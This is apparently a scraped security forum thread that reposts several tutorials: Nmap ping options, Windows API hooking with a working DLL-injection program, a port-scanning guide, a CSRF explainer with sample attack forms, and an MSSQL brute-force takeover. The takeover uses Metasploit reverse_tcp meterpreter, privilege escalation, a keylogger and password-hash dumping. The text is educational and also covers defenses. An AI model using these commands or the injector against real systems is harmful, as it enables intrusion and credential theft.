LAN’s IP, which doesn’t have any UDP services. Sctp init ping The -PY parameter instructs Nmap to perform an SCTP INIT ping. This option sends an SCTP packet containing a minimal INIT chunk. This discovery method attempts to locate hosts using the Stream Control Transmission Protocol (SCTP). SCTP is typically used on systems for IP based telephony. Syntax:nmap –PY target In the picture, though there is no sctp services on the machine, we have to use the –pn option for discovery. ICMP Echo ping The -PE option performs an ICMP (Internet Control Message Protocol) echo ping on the specified system. Syntax:nmap –PE target This type of discovery works best on local networks where ICMP packets can be transmitted with few restrictions. ICMP Timestamp ping The -PP option performs an ICMP timestamp ping. ICMP Address mask ping The -PM option performs an ICMP address mask ping. Syntax:nmap –PM target This unconventional ICMP query (similar to the -PP option) attempts to ping the specified host using alternative ICMP registers. This type of ping can occasionally sneak past a firewall that is configured to block standard echo requests. IP Protocol Ping The -PO option performs an IP protocol ping. Syntax:nmap –PO protocol target An IP protocol ping sends packets with the specified protocol to the target. If no protocols are specified, the default protocols 1 (ICMP), 2 (IGMP), and 4 (IP-in-IP) are used. ARP ping The –PR option is used to perform an arp ping scan. The -PR option instructs Nmap to perform an ARP (Address Resolution Protocol) ping on the specified target. SYTAX: nmap –PR target The -PR option is automatically implied when scanning the local network. This type of discovery is much faster than the other ping methods. Traceroute The –traceroute parameter can be use to trace the network path to the specified host. Syntax: nmap –traceroute target Force Reverse DNS Resolution The -R parameter instructs Nmap to always perform a reverse DNS resolution on the target IP address. Syntax: nmap –R target The -R option is useful when performing reconnaissance on a block of IP addresses, as Nmap will try to resolve the reverse DNS information of every IP address. Disable Reverse DNS Resolution The -n parameter is used to disable reverse DNS lookups. Syntax:nmap –n target Reverse DNS can significantly slow an Nmap scan. Using the -n option greatly reduces scanning times – especially when scanning a large number of hosts. This option is useful if you don’t care about the DNS information for the target system and prefer to perform a scan which produces faster results. Alternative DNS lookup method The –system-dns option instructs Nmap to use the host system’s DNS resolver instead of its own internal method. Syntax:nmap –system-dns target Manually Specify DNS server The –dns-servers option is used to manually specify DNS servers to be queried when scanning. Syntax: nmap –dns-servers server1 server2 target The –dns-servers option allows you to specify one or more alternative servers for Nmap to query. This can be useful for systems that do not have DNS configured or if you want to prevent your scan lookups from appearing in your locally configured DNS server’s log file. List Scan The -sL option will display a list and performs a reverse DNS lookup of the specified IP addresses. Syntax:nmap –sL target In the next installment, I will discuss how to discover services, host, and banners using different methods, and will also discuss how to find firewalls and how to evade them using NSE by Nmap, and how to write your own Nmap script engine. The most important part of Nmap is knowing how to find vulnerability and try to exploit them. Stay tuned. Reference Nmap - Free Security Scanner For Network Exploration & Security Audits. Source
-
API hooking is a technique by which we can instrument and modify the behavior and flow of API calls. API hooking can be done using various methods on Windows. Techniques include memory break point and .DEP and JMP instruction insertion. We will briefly discuss the trampoline insertion techniques. Hooking can be used to introspect calls in a Windows application or can be used to capture some information related to the API Calls. Let us consider the following application making some basic Win32 API calls. /************************************************* Simple WIN32 APP making some API calls ************************************************/ #define WIN32_LEAN_AND_MEAN #include <windows.h> #include <stdio.h> int main(int argc, char **argv) { MessageBox(NULL, "Hello world", "Hello World!", MB_OK); return EXIT_SUCCESS; } Running this program will lead us to this message box: Now let us consider the situation that we want to monitor the call to the message. The following diagram illustrates the procedure. The code which is responsible for the jump to the hooked dll is known as trampoline. So the basic idea is to redirect the call at the base of the API function. For injection related purposes, we will create an injector. Following is the code for the injector exe that will be used to create a process in suspended mode or will try to inject in a running process. int main(int argc, char **argv) { char* pName = 0; unsigned int type = 0, PID; unsigned char psDLLname [MAX_PATH] = {0}; LPVOID pvMem = NULL; LPDWORD rc; PROCESS_INFORMATION ProcessInfo; STARTUPINFO StartupInfo; HANDLE hProcess, hProcess2, hThread; if (argc < 3) { printf("...[] Usage %s <ProcessName> / <process ID> <type = 1 for injection , 2 for creation>...", argv[0]); exit(0); } type = atoi(argv[2]); EnableDebugPriv(); printf("n [].......... Type = %d , Process Name = %sn", type, argv[1]); ZeroMemory(&StartupInfo, sizeof(StartupInfo)); StartupInfo.cb = sizeof StartupInfo ; //Only compulsory field if (type == 1) // Injection { PID = atoi(argv[1]); hProcess = OpenProcess( PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION |PROCESS_VM_WRITE | PROCESS_VM_READ, FALSE, PID ); if (!hProcess ) { printf("Open Process Failed.."); } } else // creation { pName = argv[1]; CreateProcess(pName, NULL, NULL,NULL,FALSE,CREATE_SUSPENDED,NULL,NULL,&StartupInfo,&ProcessInfo); hProcess = OpenProcess( PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION |PROCESS_VM_WRITE | PROCESS_VM_READ, FALSE, ProcessInfo.dwProcessId ); } GetModuleFileName(NULL, psDLLname, MAX_PATH); sprintf(psDLLname, "%s.dll", psDLLname); pvMem = VirtualAllocEx( hProcess, 0, MAX_PATH, MEM_COMMIT, PAGE_EXECUTE_READWRITE ); WriteProcessMemory( hProcess, pvMem, psDLLname, MAX_PATH, NULL ); hThread = CreateRemoteThread( hProcess, 0, 0, LoadLibrary, pvMem, 0, &rc ); ResumeThread(hThread); ResumeThreads(ProcessInfo.dwProcessId, 1); } In order to give the application SE_DEBUG privileges, we have to elevate the privileges to SE_DEBUG PRIVILEGES. For that purpose we can use the following API calls. void EnableDebugPriv( void ) { HANDLE hToken; LUID sedebugnameValue; TOKEN_PRIVILEGES tkp; if ( ! OpenProcessToken( GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken ) ) { _debug(); return; } if ( ! LookupPrivilegeValue( NULL, SE_DEBUG_NAME, &sedebugnameValue ) ) { _debug(); CloseHandle( hToken ); return; } tkp.PrivilegeCount = 1; tkp.Privileges[0].Luid = sedebugnameValue; tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; if ( ! AdjustTokenPrivileges( hToken, FALSE, &tkp, sizeof tkp, NULL, NULL ) ) _debug(); CloseHandle( hToken ); } Similar code can be found here: Enabling and Disabling Privileges in C++ (Windows) Inside the dll we need to code a handler and JMP replacer for the API call MessageBoxA. JMP instruction has the following OPCODE structure. JMP = {0xe9} ADDRESS = {0×00, 0×00, 0×00, 0×00, 0×00} where ADDRESS = Jump destination – (EIP + SIZEOF(OPCODE)) which can be simply calculated using the following code: unsigned char* JMP_OPCODE(unsigned int addr, unsigned int Hook) { static unsigned char OPCODE[0x06] = {0xe9, 0x00, 0x00, 0x00, 0x00, 0x00}; unsigned int Addr_RESX = addr - (Hook + 5); memcpy(&OPCODE[1], &Addr_RESX, sizeof(int)); return OPCODE; } A similar thing can be done for a call OPCODE: unsigned char* CALL_OPCODE(unsigned int addr, unsigned int Hook) { static unsigned char OPCODE[0x06] = {0xe8, 0x00, 0x00, 0x00, 0x00, 0x00}; unsigned int Addr_RESX = addr - (Hook + 5); memcpy(&OPCODE[1], &Addr_RESX, sizeof(int)); return OPCODE; } For example if we want to get the JMP opcode MessageBoxA function we will use this code in the following ways: Void hook_function_MessageBoxA { ….. Hook Code …. Jump back } unisgned char * trampoline = JMP_OPCODE(MessageBoxA, hook_function_MessageBoxA); http://resources.infosecinstitute.com/wp-content/uploads/042214_1534_APIHooking3.png Unsigned int org_buffer[5] = {0}; // This will save the original bytes at the function buffer = getAddr("MessageBoxA", "user32.dll"); VirtualProtect(buffer, 5, PAGE_EXECUTE_READWRITE, &x); MessageBox(NULL, "Hello word"!, "Hello world!", MB_OK); We also need to save the original instructions and when our hook is called we need to replace them again. memcpy(org_buffer, API_CALL, 5); We also need to modify the Hooked function to replace the original bytes afterwards: Void hook_function_MessageBoxA { ….. Hook Code memcmy(API_CALL, org_buffer, 5); __asm { JMP [API_CALL];<br/> } Source
- 1 reply
-
- 1
-
Felicitari @sleed sa ne anunti si pe noi daca primesti HOF.
-
Nu baga telefonu la microunde, @Bebe daca dai restore o sa iti ceara contul icloud.
-
Given the massive spread of the Internet and Internet-related activities in recent times, there is an equal spread in silent activities behind the web too. These silent activities might relate to port scanning, vulnerability scanning, finding publicly available technical and non-technical information about target organizations, and so on. At any given point of time, there are many such scans being done on the Internet, and most of them are harmless, but some are done with a malicious intent. This paper seeks to give a soup to nuts version of port scanners by discussing the definition of port scanners, port scanning as part of security assessment, different types of scanners, Super Scan 4.1, and port scan detectors. Definition of port scanning As already stated, port scanning can be used for malicious purposes or for genuine purposes. It is a commonly known fact that there are 65,535 TCP ports and 65,535 UDP ports. Port numbers ranging from 0 to 1024 are well known ports. As an example, port number 80 is associated with HTTP, port number 21 is mapped to FTP, port 25 to SMTP, and so on. Port scanning is a reconnaissance technique which involves scanning the host for open and active ports. It primarily involves sending a message to each of the individual ports and detecting which are open. These open ports offer vulnerabilities that can be exploited and sometimes even bring down production environments. There are numerous port scanning tools, and popular examples are Nmap and Super Scan. We will discuss McAfee’s Super Scan 4.1, which is a Windows port scanning tool, later in this paper. The “good way” of doing port scanning The activity of port scanning can be done as part of security assessment of one’s own organization seeking to weed out security holes. It is more of a defensive approach to seek vulnerabilities and destroy them rather than reactive approach. The malicious way of doing port scanning Hackers or anyone with a malicious intent can do “port scanning” by systematically probing open ports which might lead hackers to gain entry into organizations and steal their private data. Statistics relating to port scanning Before we move onto the other specific details relating to port scanning, we’ll first discuss some statistics. The activity of port scanning itself deals with port numbers and IP addresses. Therefore, let us first get the bare facts about these two important concepts. There are 2 32(4 billion) IP addresses in the world as of April 2012. (List of countries by IPv4 address allocation). Let us see the details regarding these 232 IP addresses… According to this report from Internet Census 2012: “165 million IPs had one or more of the top 150 ports open. 36 million of these IP addresses did not respond to ICMP ping. 141 Million IPs had only closed/reset ports and did not respond to ICMP ping.” (Port scanning /0 using insecure embedded devices) Next we will discuss port scanning as part of the security assessment of an organization. Security assessment and port scanning Port scanning is the first step in vulnerability scanning, which is part of a security assessment. These are the steps when performing a security assessment: Planning The scope of security assessments should be planned and it should be approved by senior management. Reconnaissance Reconnaissance is a stage where public information about the organization is probed and retrieved. Network service discovery In this stage we discover the hosts and servers that can be accessed from outside. These can then be used for cyber attacks. Vulnerability discovery The servers and hosts that were visible outside are then probed for vulnerabilities. This where port scanning takes place and open ports are figured. Verification of perimeter devices Perimeter devices like firewalls, routers, IDS and IPS are evaluated and made sure that they function according to standards. Remote access We make sure that remote access devices like VPN and wireless points are configured properly. Result analysis and documentation This is the last step in the security assessment and we finally document the results by determining if the vulnerabilities found will exploit the security controls placed. (Stephen Northcutt) In this post we will only explore the steps relating to gathering public information and vulnerability discovery, which pertain more to “port scanning”. Gathering public information Before we find vulnerable ports to launch attacks, it is also important to gather as much information from public sources as possible. We will discuss two websites that there are good sources of public information: 'Netcraft.com’ gives detailed information about “technologies that power a website”. (Netcraft.com) For example, we get the following information when we search for ‘Google.com’ on the ‘Netcraft’ website: We see the information related to IP address, IPv6 address, hosting country, DNS admin, and other things. To get the IP addresses associated with a particular organization, we next query the ARIN database. ARIN stands for ‘American Registry for Internet numbers’. When the ‘Google.com’ website is queried, it returns the following result: Once enough public, technical and non-technical information has been gathered, the next step will be to do a vulnerability assessment. It is in the vulnerability phase that port scanning is done. Different types of scanning We will next discuss the different types of port scanning techniques. The list presented below gives a broad set of scanning techniques. Vanilla connect() scanning This is the simplest of all scanning techniques and it involves sending packets to each and every port and detecting whether they respond or not. If there is a response from a port, it indicates that the port is open and it can be used to launch an attack. However, since this is a very simple scan, it can be detected and logged by network perimeter devices. Both ‘Nmap’ and ‘Super Scan’ can be used to perform vanilla scans. Stealth scanning Since the vanilla scanning technique can be detected by perimeter devices like firewalls and IDS, ‘stealth scanning’ can be used by hackers which will be undetected by auditing tools. This type of scanning involves sending the packets with stealth flags – “some of the flags are SYN, FIN and NULL”. (Surveying Port Scans and Their Detection Methodologies, 2010) Bounce Scan This type of scan is used to scan ports discreetly and indirectly. It is more prevalent with the FTP protocol making it to be called as the ‘FTP bounce attack’. The attacker uses the PORT command to gain access to ports on the target machine through a vulnerable middle FTP server. The vulnerable FTP server is the one that is used to bounce off the attacks. UDP scanning This type of scanning involves finding open ports related to the UDP protocol. Super Scan 4.1 Now that we have seen the concept of port scanning and how to gather public information, we will now actually do ‘port scanning’. We will discuss Super Scan 4.1 which is a powerful port scanner, pinger and resolver. While ‘Nmap’ is a free port scanning tool for different operating systems, Super Scan 4.1 is a Windows-only port scanner from McAfee. Super Scan 4.1 is expected to run only on Windows XP and 2000. Listed below are some of the features of Super Scan 4.1: It provides superior scanning speed for detecting both UDP and TCP open ports. TCP SYN scanning is possible. Different tools such as ping, ICMP trace route, Whois, and Zone transfer are available. We can read the IP addresses which need to be scanned from a file. The results of the scan can be read in a HTML file. TCP and UDP banner grabbing are available. (Super Scan 4.1) Running Super Scan 4.1 Super Scan 4.1 might not as popular as its counterpart ‘Nmap’ – nevertheless, it is a good port scanner with good features. The minor drawback is that it works only with Windows systems. It can be downloaded from the following link: SuperScan | McAfee Free Tools The important point when trying to run Super Scan 4.1 is that it can only be ‘Run as Administrator’. In order to do this, it is necessary to right-click on the ‘Super Scan 4.1.exe’ and click ‘Run as administrator’ as shown in the picture below. As an example, let us try and port scan our own computer for open ports. The most important tabs to work with in port scans are the ‘Host and Service Discovery’ tab and the ‘Scan’ tab. Host and Service Discovery tab In order to scan all UDP and TCP ports between the ranges 0-65535 on one’s own computer, it is necessary click the ‘Host and Service Discovery’ tab and enter it in the fields as shown below. Note: The ports to be scanned can also be read from a file. Next, the UDP port scan type needs to be selected as ‘Data+ICMP’ and TCP port scan type needs to be specified as ‘Connect’. Once the ‘Host and Service Discovery’ tab has been configured, we next configure the IP address of the target system or the range of IP addresses that need to be port scanned by means of the ‘Scan’ tab. Scan tab We begin this by entering the IP address or the host name of one’s own computer. The IP address of one’s own computer can be found by using the ‘ipconfig’ command at the DOS window. We locate the IPv4 address and enter it in the ‘Hostname/IP’ tab. The above picture shows where the IP address needs to be entered. Once the ‘Start’ button is clicked, scanning is in progress and the results will be seen as shown. These results can also be viewed in HTML format. To ols tab Next, we discuss the ‘Tools’ tab in Super Scan 4.1. Once the IP address or the host name or URL is stated, we can perform various actions with the tools provided. Super scan 4.1 allows you to do: Hostname/IP Lookup Ping ICMP Traceroute Zone transfer HTTP HEAD request HTTP GET request HTTPS GET request Whois CRSNIC Whois IP ARIN WhoisIP RIPE WhoisIP APNIC WhoisIP We have seen the different features of Windows port scanning tool ‘Super Scan 4.1?. The activity of port scanning itself can be reduced by deploying firewalls at critical locations. While it is possible to port scan the entire set of IP addresses across the world (which might take several days), it is not a good idea, as port scan detectors might be employed by different websites, causing you to be blacklisted. (masscan) Conclusion In conclusion, we will just skim on the topic of port scan detector. If there is a tool to scan ports, then there will be a tool to “detect” port scanners. Obviously, every bad needs a good and in this aspect, a port scanner detector is the countermeasure to port scanning tools. Bitdefender’s Internet Security (2014) has features that put all ports on the defensive mode and makes them invisible from outside. (Bitdefender Internet Security (2014)) We have seen the entire life cycle of port scanners from the definition, types, port scanning as part of security assessment, Super Scan tool as well as port scanner detectors. More tools with improved and sophisticated features will be developed as the years go by. Bibliography Bitdefender Internet Security (2014). (n.d.). Retrieved July 9, 2014, from pcmag.com: Shared Privacy Protection - Bitdefender Internet Security (2014) Review & Rating | PCMag.com List of countries by IPv4 address allocation. (n.d.). Retrieved July 4, 2014, from Wikipedia: List of countries by IPv4 address allocation - Wikipedia, the free encyclopedia masscan. (n.d.). Retrieved July 9, 2014, from http://www.tuicool.com/articles/A3qI7b Netcraft.com. (n.d.). Retrieved June 24, 2014, from Netcraft.com: Netcraft | Internet Research, Anti-Phishing and PCI Security Services Port scanning /0 using insecure embedded devices. (n.d.). Retrieved July 4, 2014, from Internet Census 2012: Internet Census 2012 Stephen Northcutt, L. Z. Inside Network Permieter Security. Super Scan 4.1. (n.d.). Retrieved July 7, 2014, from McAfee.com: SuperScan | McAfee Free Tools Surveying Port Scans and Their Detection Methodologies. (2010, August 23). Retrieved July 1, 2014, from http://www.cs.uccs.edu/~jkalita/papers/2011/BhuyanMonowarComputerJournal.pdf Source
-
Cross Site Request Forgery or CSRF is one of top 10 OWASP vulnerabilities. It exploits the website’s trust on the browser. This vulnerability harms users’ and can modify or delete users’ data by using user’s action. The advantage of the attack is that action is performed as a valid user but user never knows that he has done something. If the target account is of website administrator, attacker can perform admin’s action of the web application. Poor coding and wrong assumptions are the main reason why the vulnerability exists on the web application. Sometimes, it is typical to understand how this vulnerability is exploited by attackers. In this detailed article, we will understand Cross Site Request Forgery vulnerability. And we will also create a form with strong protection from this vulnerability. We will also see popular frameworks, scripts and methods that can be used to patch this vulnerability. What is Cross Site Request Forgery Attack? Cross Site Request Forgery or CSRF is an attack that forces a malicious action to an innocent website from end user’s (valid user) browser when he/she is running a valid session of the website. If user is authenticated on a website, every action performed from his browser will belong to him. The website also thinks that the request is coming from the user and it has been made by him. Most common effects of this attack are change of password, fund transfer from bank account, purchase of an item etc. This attack is performed by making fake forms or requests that behaves exactly same as in original website. When these requests are sent to a website from an authenticated user’s browser, the website thinks the request has been made by the user. In the next section, we will see how CSRF works. How CSRF Works: Most of the times, the attacker uses a third party trusted website to perform this attack. Fake links are posted on forums and social networking websites that may lead to CSER. The attack follows a sequence of requests and responses. Suppose a victim is logged in on target website. He finds a link on a forum. The link performs a malicious link on the target website. He clicks on the link and the link sends the malicious request to the target website. Now for example: You are logged in on a website http://targetwebsite.com. This website has a delete account action via button method on a page. This button submits a delete request via a form link this. <form action=’http://targetwebsite.com/deleteaccount.php‘ method=’post’> <input type=’text’ value=’Delete’ name=’delete’> </form> Once the button is clicked, website will delete the account of the logged in user. So, it relies on the active session to identify the user. Attacker has created a fake page that submits this form onload. He has posted the link of that page on a forum. You found the link interesting and clicked. Once you clicked on the link, that page submits the form. Form action will delete your account because you have an active session. In this way, your account has been deleted by the attacker without your knowledge. But request had been made from your browser. I am sure; this simple example had made it clear how the vulnerability affects website’s users. Similarly, we can show how it can affect your bank accounts if vulnerability exists on your banking applications. If the action is performed by a get request, the attacker can also craft the request in an image tag. The SRC attribute of the image will be the action link on the form. When the image loads on the page, it will perform the action. <img src=”http://targetwebsite.com/app/transferFunds?amount=25000&targetAccount=attackersAcctnumber” width=”0? height=”0? /> Misconceptions of CSRF Attack Cross Site Request Forgery is one of most dangerous web application vulnerabilities. So, it must be checked and patched carefully. But there are few misconceptions about the patching. Generally developers use few ways to patch the vulnerability. But those ways are not enough to prevent this vulnerability. There are the few wrong ways of patching CSRF: Use of Post Requests for Critical Tasks. Developers think that it is easy to create a fake get request. But creating a fake POST request is not easy. If you are into web development and security, you can easily create a page with form that can submit the form via JavaScript on page load. This way will never prevent CSRF. SO, if you are going to apply this logic, you should think twice. Any hidden form can be triggered via JavaScript. Another bad example of CSRF patching is URL Rewriting. Developers create the URL rewriting method with unique session id’s in a URL. This makes the URL unpredictable. But this method also exposes the user’s credentials in the URL. May be it prevents CSRF, but it’s equally harmful for users. Sometimes websites use multi-step transaction process. If we do it in a previous account delete example, suppose website asks for confirmation after requesting account deletion. If both requests have no prevention against CSRF, attacker can predict and perform all steps or reduce the steps of transaction request via some ways. There are few other weak prevention methods which are not so important to discuss here. Proven ways to prevent CSRF vulnerability. Checking for Referral Header Checking for a referral header can help in preventing the CSRF. If the request is coming from some other domain, it must be the fake request so block it. Always allow requests coming from the same domain. This method fails if the website has open redirection vulnerabilities. Attackers can perform GET CSRF by using open redirection. Now these days, most of the applications use HTTPS connection. In this the referrer will be omitted. So this method will not help if a website is using https. So, we will have to search another way. Captcha Verification in forms This is another nice way to prevent CSRF attacks on forms. Captcha verification process was initially developed to prevent BOT spam in forms. But it can also be helpful in preventing CSRF. As the captcha is generated on the client side randomly, an attacker cannot guess the pattern. So, he will never be able to send the correct Captcha with a fake request. And all fake requests will be blocked by a Captcha verification function. This method is not user friendly. Most of the users don’t want to fill the Captcha on the website. So, we should try to find ways that prevent CSRF vulnerability without adding any extra burdens on users. Unpredictable Synchronizer Token Pattern This is the most secure method for preventing CSRF. Unlike captcha verification, this method has nothing to do with users. So, users will never know that something has been added to protect them. In this method, the website generates a random token in each form as a hidden value. This token is associated with the users’ current session. Once the form is submitted, website verifies whether the random token comes via request. If yes, then verify whether it is right. By using this method, developers can easily identify whether the request was made by the user of attacker. </pre> <form action="accountdelete.php" method="post"><input type="hidden" name="CSRFToken" value="OWY4NmQdwODE4hODRjN2DQ2NTJlhMmZlYWEwYzU1KYWQwMTVhM2JmLNGYxYjJiMGI4jTZDE1ZDZjMTViMGYwMGEwOA==" /> ...</form> <pre> Strength of this method depends on the token generation method. So, always try to generate the token in the manner that it is always unpredictable. So, if you are thinking to implement this by your own, try to randomize it. You can use: $randomtoken = md5(uniqid(rand(), true)); or try this $randomtoken = base64_encode( openssl_random_pseudo_bytes(32)); by using base64_encode, it ensures that the generated value will not break your HTML layout with html chars. Generate this $randomgtoken, once the session is initiated after login. And add this to your session variables. $_SESSION['csrfToken']=$randomtoken. Add this to every form for users. <input type=’hidden’ name=’csrfToken’ value=’<?php echo($_SESSION['csrfTOken']) ?>’ /> The csrfToken is unique to each session. In every new session, it will generated again and then varified with form requests. You can either use a single CSRF token for all forms in single session. But using different for all forms may be more secure. But using this method for generating a different csrfToken for different forms can create trouble when users open multiple forms in multiple tabs and submit one by one. There are few opensource PHP classes and libraries are also available. You can use these opensource classes to implement a strong protection against CSRF vulnerabilities. Few opensource libraries are: 1. Clfsrpm Clfsrpm is a popular PHP class that gives a strong way of preventing CSRF. It gives few public functions that you can use to generate and validate CSRF tokens. Complex part has already been done by the developer. You can read more and download the class from the link: CSRF Protection Class 2. NoCSRF NoCSRF is another simple anti-CSRF token generation and checking class written in PHP5. It also comes with easy to understand examples to learn how to properly implement this class on your web application. You can download NoCSRF from here: https://github.com/BKcore/NoCSRF 3. csrf by Skookum This is another PHP implementation of CSRF protection in PHP. Code is available for free. SO you can copy and use in your application. Get the code from here: https://github.com/Skookum/csrf/blob/master/classes/csrf.php 4. anticsurf anticsurf is another small PHP library that can be used for preventing CSRF in PHP web applications. This library claims to give strong entropy for brute force attacks. It also implements a one-time use token and provide timeout restriction. Read more about this PHP library and download from here: https://code.google.com/p/anticsurf/ 5. CSRF-Magic CSRF-Magic is another strong implementation that can prevent CSRF attack on a website. The library is available for free with an online demonstration. You can only include a file on the top of your PHP files. And this library will do the rest of the work. It re-writes the scripts and forms on your websites and then intercepts the POST request to check the token injected but it means that it automatically adds everything in your traditional insecure forms. You don’t need to add extra codes for this. Only include the library file at the top. One of the easiest CSRF protection libraries available for PHP applications… Download the library and see the demo here: csrf-magic: Wizard CSRF Protection for PHP 6. CSRF Protection CSRF Protection is also a nice and simple class. Although, it doesn’t come with tutorials. It has fully commented codes to understand how to use this library. It gives you few functions to generate and then validate the CSRF tokens. On the download page, it has given few sample codes to show how to use this class to generate and then validate the CSRF tokens on your own web application. Download the CSRF Protection library from github via this link: https://github.com/XCMer/csrfprotect You can use any of the above classes or libraries according to your choice. But do not forget to share with us via comments. User side Prevention CSRF is a harmful vulnerability so, users should also follow few steps to ensure their security. These are the few important points: Always logout important web accounts when not in use. Never use important web accounts (such as online banking) along with free web surfing. Use No-Script browser add-on to protect yourself from malicious scripts. Conclusion In this post, we have seen that Cross Site Request Forgery is a harmful vulnerability and affects users’ accounts. We have also seen various ways to prevent this attack and protect users’ accounts. If the website has a Cross Site Scripting vulnerability, performing CSRF becomes easier. Attackers can create an automatic worm to defeat CSRF defenses. In this post, we have discussed various open source libraries and classes. These classes can be directly used within PHP based web applications to prevent CSRF vulnerability. Web developers should take care of website’s security and follow the given tips. There are various tools and manual methods are available to test for CSRF. Most popular tool is OWASP CSRF Tester. You can download it from here: https://www.owasp.org/index.php/Category:OWASP_CSRFTester_Project If you are thinking to start manually, you can review codes and see the forms. If the random token is not available, you should add with available open source classes. I am sure, now you know enough about CSRF and it’s patching. If you have anything to say about this, you can share it with us via comments. Source
-
All systems and database administrators will agree that password complexity does not go very far when it comes to SQL servers. Whether this is done to keep troubleshooting simple for support staff or it is simply a matter of underestimating the risks, it doesn’t really matter. What matters is that this makes it very easy for an attacker to get full access to the system. In this attack, we will use a standard install of Linux Kali and the preinstalled Metasploit framework. The target is a Windows XP machine, running a Microsoft SQL Server 2005 instance. The same attack will work on any MS SQL platform and Windows OS, because the weakness in the system here is the password strength, not the environment itself. Reconnaissance As in any attack, we will first need to gather intelligence on our target system. One option is to use tools like NMAP to scan a certain IP range for standard SQL ports. Command: Nmap –sT –A –PO 192.168.23.0/24 Metasploit also has the mssql_ping scanner built in. This scanner will identify any Microsoft SQL server in a specific IP range. Commands: use auxiliary/scanner/mssql/mssql_ping set RHOSTS 192.168.23.0/24 (our target IP range) set THREADS 8 run Now that we have our target system (192.168.23.100) and some more details on the version of Microsoft SQL server (2005 SP4, TCP port 1433), we can move on to the next step. Attack This attack is based on a simple principle. In most cases Microsoft SQL server will be installed in a mixed mode instance. The default user for this is “sa.” Very often a simple password is used for this user. This means it will be relatively easy to brute-force the password, using a dictionary file. These dictionary files can be downloaded or generated. The benefit of generating a customized list is that some tools allow for the manual addition of specific terms such as the software name or vendor that could have been used by the application installer. That would cover, for instance, a password like “Sandstone01? for the SQL instance running the databases for the application “Sandstone”. For the attack we will use the built-in tool MSSQL_Login. After specifying the target and a password file, the dictionary attack will begin. Commands: use auxiliary/scanner/mssql/mssql_login Set PASS_FILE /root/passwords.txt (the dictionary file) Set RHOSTS 192.168.23.100 Set Threads 8 Set verbose false run If this step of the attack is successful, the SA password will be found. This by itself can be a valuable piece of information that can allow for the manipulation of the databases. In this attack, however, we will use the SA account to gain access to the underlying Windows operating system. Exploitation We can now use this SA password obtained to set up a connection to our target. Kali Linux has a tool built-in named mssql_payload. This tool will allow us to send a payload through port 1433 with our new login credentials. We will use this payload to set up a session between the target and our attacking system. Commands: use exploit/windows/mssql/mssql_payload set RHOST 192.168.23.100 (our target) set password Password01 (which we have just cracked) use payload/windows/meterpreter/reverse_tcp (our selected payload) exploit Now the fun starts. A session has been opened to our target and from here we have many commands at our disposal. Keep in mind, however, that many antivirus programs will detect, block, and remove the Meterpreter files when they are installed on a target system. From experience, however, I can say that many SQL server administrators disable any form of on-access scanning, to get the most performance out of the databases hosted by the server. If this target only runs, for instance, an overnight virus scan, it will leave plenty of time to attack and gather the data from the system and then leave undetected. Instead of using the Meterpreter payload, other payloads can be used as well. This is just a matter of running the same commands as above but changing the name of the payload. Payload “generic/shell_bind_tcp,” for instance, will gain command prompt access to the target system. Privilege Escalation For many of these commands, we will need to increase our user access level. Tools to create screenshots and keyloggers and tools to extract password hashes will need to run with administrative privileges. This is made quite easy with the Meterpreter shell. First, we will generate a list of running processes with the “ps” command. We can then use the “migrate” command to migrate to a process with a higher level of system access. In this case that will be the explorer.exe process. Now there is one extra command we need to use: getsystem. This will give the meterpreter system access to the system which is required by the migrate command. Without this, “insufficient privileges” will be returned when running the migrate process. Commands: Ps (this will show the running processes and their corresponding PID’s) Getsystem (to obtain system privileges) Migrate 1064 (the explorer.exe PID in this example) Data Collection Now that we have full system access, we can use some other tools to gather the data we need. Command: Screenshot This will create a screenshot of the target and save this as a jpeg file to the local system. Command: Run post/windows/capture/keylog_recorder This will run a keylogger on the target and save the recoded text to a file on the local system. This can be used to obtain web login details, bank accounts and credit card information, etc. Many anti-virus programs, however, can easily pick up this keylogger. Command: Migrate 772 (The PID for services.exe) Run post/windows/gather/hashdump User passwords in a system are usually stored in the form of one-way hash values. These can be cracked by sheer brute force or by more sophisticated, related attacks, such as dictionary or rainbow table cracking methods. See my article on that topic: “Password Auditing an Active Directory Databases.” To obtain the hash values from the target system, we will need to migrate to the services.exe process to be able to get the right level of system access. These values can be used in the many password brute-force tools available, such as Ophcrack and Hashcat. The Result In this process of a few relatively easy steps, we have bypassed any possible firewall by using an open SQL Server port and have not only gained full database access, but we have used that to gain full operating system access. The keylogger and extracted password hashes might even gather more useful network details, such as usernames and passwords, to gain further access to other systems. How to Defend against This attack. There are a few options to protect a system from this attack. First of all: Use a proper password! No matter what the reason is, a production SQL server should never have a simple SA password that can be brute-forced without much effort. Apart from that, an intrusion detection system or simply monitoring the logs automatically or manually could detect a brute-force attack due to the high amount of failed login attempts. Another method of defense would be to run an active antivirus scan on the system 24/7. In this example, the payload would have been picked up and deleted or quarantined before the attack could compromise any data. Source
-
1. Introduction When a cookie has HttpOnly flag set, then JavaScript cannot read it in case of XSS exploitation. This is actually the reason why HttpOnly flag was introduced. As it can be seen, HttpOnly flag puts some restriction on cookie reading by JavaScript. Does it mean that the attacker is stopped at this point? Reading is prevented, but what about writing? HttpOnly flag was not introduced to prevent writing, so this might be potentially interesting. It turns out that HttpOnly flag can be overwritten by JavaScript in some browsers, and this overwriting possibility can be used by the attacker to launch a session fixation attack, what is the subject of the article. 2. Overwriting a cookie with HttpOnly flag by JavaScript When JavaScript can overwrite a cookie with HttpOnly flag, then the attacker can launch a session fixation attack via an HttpOnly cookie in case of XSS exploitation (you can read about session fixation attack in one of my previous articles [1]). As a consequence of a session fixation attack, the attacker can impersonate the victim, as he knows the victim’s session ID. The assumption here is that the session is not regenerated in the application after successful login. One can say at this point, that the flaw is in the application itself, because the application does not regenerate the session after successful login. This is true, but there is no reason to allow JavaScript to overwrite HttpOnly flag in some browsers, and this overwriting possibility can be used to take advantage of no session regeneration in the application after successful login in order to finally launch a session fixation attack. What about the case when session ID is regenerated after successful login? Can it be used somehow by the attacker? Then the attacker can switch a user to his own account by setting the user’s session to the one that the attacker is currently using. Then the user thinks that he is using his own account, and actually enters some sensitive information to the attacker’s account. 3. Browsers which allow JavaScript to overwrite HttpOnly cookie I found that the following browsers allow JavaScript to overwrite HttpOnly cookies: Safari Opera Mobile Opera Mini BlackBerry browser Konqueror browser The problem was reported to the vendors (4 February 2014). Internet Explorer, Firefox and Opera (standard install) are not vulnerable to the aforementioned attack. 4. Response from vendors Opera Software confirmed the problem in 